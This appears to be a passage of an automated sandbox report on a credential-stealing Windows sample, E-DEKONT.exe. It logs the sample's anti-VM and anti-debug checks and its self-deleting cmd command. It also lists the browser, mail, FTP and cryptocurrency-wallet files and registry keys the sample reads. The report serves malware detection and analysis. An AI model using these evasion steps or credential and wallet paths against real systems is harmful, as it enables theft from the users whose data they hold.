Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\logicalization Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\logicalization\libxml2-2.0.typelib Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\logicalization\sgelngdernes.Dep74 Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede\memstat.c Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Sldede\selection-end-symbolic.symbolic.png Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\Desktop\E-DEKONT.exe Process created: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "E-DEKONT.exe
Source: C:\Users\user\Desktop\E-DEKONT.exe Process created: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "E-DEKONT.exe Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\E-DEKONT.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B6842D rdtsc 1_2_02B6842D
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: K32EnumDeviceDrivers, 1_2_02B86198
Source: C:\Users\user\Desktop\E-DEKONT.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_004065C5 FindFirstFileW,FindClose, 1_2_004065C5
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405990
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_00402862 FindFirstFileW, 1_2_00402862
Source: C:\Users\user\Desktop\E-DEKONT.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\E-DEKONT.exe API call chain: ExitProcess graph end node
Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: E-DEKONT.exe, 00000004.00000003.108881783775.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108992838973.0000000001A5B000.00000004.00000020.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108991550054.00000000019F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: E-DEKONT.exe, 00000001.00000002.108853187405.0000000010059000.00000004.00000800.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: E-DEKONT.exe, 00000004.00000002.108994316783.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_10001B18
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B6842D rdtsc 1_2_02B6842D
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B66CB5 mov eax, dword ptr fs:[00000030h] 1_2_02B66CB5
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B66CCE mov eax, dword ptr fs:[00000030h] 1_2_02B66CCE
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B71135 mov eax, dword ptr fs:[00000030h] 1_2_02B71135
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B66D12 mov eax, dword ptr fs:[00000030h] 1_2_02B66D12
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B83D61 mov eax, dword ptr fs:[00000030h] 1_2_02B83D61
Source: C:\Users\user\Desktop\E-DEKONT.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B804ED CreateFileA,LdrLoadDll, 1_2_02B804ED
Source: C:\Users\user\Desktop\E-DEKONT.exe Process created: C:\Users\user\Desktop\E-DEKONT.exe C:\Users\user\Desktop\E-DEKONT.exe Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "E-DEKONT.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403373

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000004.00000002.109020742612.000000001D9E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.109010127986.000000001D4D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: E-DEKONT.exe PID: 4868, type: MEMORYSTR
Source: C:\Users\user\Desktop\E-DEKONT.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe File opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\ Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe File opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xml Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt Jump to behavior
Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum\wallets\
Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum\wallets\
Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %APPDATA%\Exodus\
Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %APPDATA%\Exodus\
Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %appdata%\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\E-DEKONT.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: Yara match File source: 4.2.E-DEKONT.exe.1df8883c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.E-DEKONT.exe.1df32afc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.E-DEKONT.exe.1df37450.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: E-DEKONT.exe PID: 4868, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs